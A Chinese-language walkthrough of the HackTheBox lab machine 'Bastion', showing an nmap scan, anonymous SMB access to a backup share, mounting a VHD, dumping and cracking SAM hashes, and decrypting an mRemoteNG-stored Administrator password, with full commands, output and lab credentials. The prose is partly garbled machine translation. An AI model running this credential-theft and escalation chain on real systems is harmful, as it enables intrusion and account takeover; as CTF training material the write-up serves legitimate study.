对HackTheBox里面的Bastion测试
开干,第一步是对机器进行Nmap查找正在运行的服务:
root@kali://root/Documents/bastion# cat scan
# Nmap 7.70 scan initiated Wed Aug 7 10:36:31 2019 as: nmap -A -oN scan -p- 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.032s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/7%OT=22%CT=1%CU=34774%PV=Y%DS=2%DC=T%G=Y%TM=5D4A9C1A
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10E%II=I%TS=A)SEQ(SP=103%GCD
OS:=1%ISR=10E%CI=I%II=I%TS=A)SEQ(SP=103%GCD=1%ISR=10E%TS=A)OPS(O1=M54DNW8ST
OS:11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DS
OS:T11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=8
OS:0%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F
OS:=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T
OS:=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=
OS:164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m58s, deviation: 1h09m14s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-07T11:38:29+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-07 10:38:26
|_ start_date: 2019-08-07 09:01:18
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 31.07 ms 10.10.12.1
2 31.11 ms 10.10.10.134
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug 7 10:38:34 2019 -- 1 IP address (1 host up) scanned in 123.32 seconds
从输出中可以看到,我们拥有SSH和一些SMB共享。然后,我运行smbmap来查找一些SMB共享可用:
root@kali:~/Documents/bastion# smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY
我们有两个共享R /W。这些是备份和IPC。备份听起来是最有前途的,所以我首先挂载了此共享,然后开始浏览文件以查看是否突出。我在\ WindowsImageBackup \ L4mpje-PC \备份2019-02-22 124351 \文件夹中找到了一些VHD文件。
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. D 0 Fri Feb 22 12:45:32 2019
.. D 0 Fri Feb 22 12:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd A 37761024 Wed Aug 7 15:34:56 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd A 5451853824 Wed Aug 7 15:37:53 2019
BackupSpecs.xml A 1186 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml A 1078 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml A 8930 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml A 6542 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml A 2894 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml A 1488 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml A 1484 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml A 3844 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml A 3988 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml A 7110 Fri Feb 22 12:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml A 2374620 Fri Feb 22 12:45:32 2019
7735807 blocks of size 4096. 2767174 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>
我下载了最大的VHD文件,因为它可能包含一些有趣的内容。下载完成后,我使用vhdimount将文件挂载到/ mnt / test
root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# vhdimount 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd /mnt/test/
vhdimount 20190309
root@kali:~/Documents/bastion/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351# cd /mnt/test/
root@kali:/mnt/test# ls
vhdi1
从输出中可以看到,这已经在/ mnt / test中生成了一个图像文件。现在需要挂载该文件,刹车可以访问文件系统。在映像文件上运行fdisk -l为我们提供了更多信息。
root@kali:/mnt/test# fdisk -l vhdi1
Disk vhdi1: 100.1 MiB, 104970240 bytes, 205020 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000
Device Boot Start End Sectors Size Id Type
vhdi1p1 128 204927 204800 100M 7 HPFS/NTFS/exFAT
现在我们知道了文件系统的起点和合并大小。我们可以分割出分区相连其安装。
root@kali:/mnt/test# mount -o ro,noload,offset=65536 vhdi1 /mnt/just/
因此,在这种情况下,它是128 * 512 = 65536。
然后,我转到/ mnt / just / Windows / System32 / config,以从SAM文件中转存储密码哈希。我使用pwdump做到了这一点。
root@kali:/mnt/tmp# cd /mnt/just/Windows/System32/config
root@kali:/mnt/just/Windows/System32/config# pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
您无法使用此方法转储管理员哈希。但是,存在L4mpje NTLM哈希。我复制了哈希副本其输入到hashkiller.co.uk中。预计算的哈希成功返回。
Cracker Results:
26112010952d963c8dc4217daec986d9 NTLM bureaulampje
现在,使用此密码,我可以通过SSH登录到计算机,浏览到桌面并捕获用户标志。
root@kali:/mnt/just/Windows/System32/config# ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.383.808.000 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt
[REDACTED]
下一步是特权升级,以尝试获取管理员提示。我在机器上四处查找,发现已安装了所谓的mRemoteNG的软件。这是欺诈子,RDP,VNC等软件的前端,并且能够保存经常访问的远程会话但是,有关有关一个问题是发现它存储的初始化不安全。可以使用脚本来输入加密的密码并输出纯文本结果。
密码存储在AppData \漫游\ mRemoteNG中的confCons.xml XML文件中。
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
22-02-2019 15:03 5.217 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 11.334.410.240 bytes free
我打开confCons.xml来检索加密的密码。它在顶部附近可见,并以base64编码。
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit"
然后,我使用mremoteng_decrypt.py从XML文件解密base64编码的密码。
root@kali:~/Documents/bastion# ./mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
root@kali:~/Documents/bastion#
使用此密码,我可以通过SSH重新登录,但是这次是Administrator。
root@kali:~/Documents/bastion# ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>more root.txt
[REDACTED]
关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者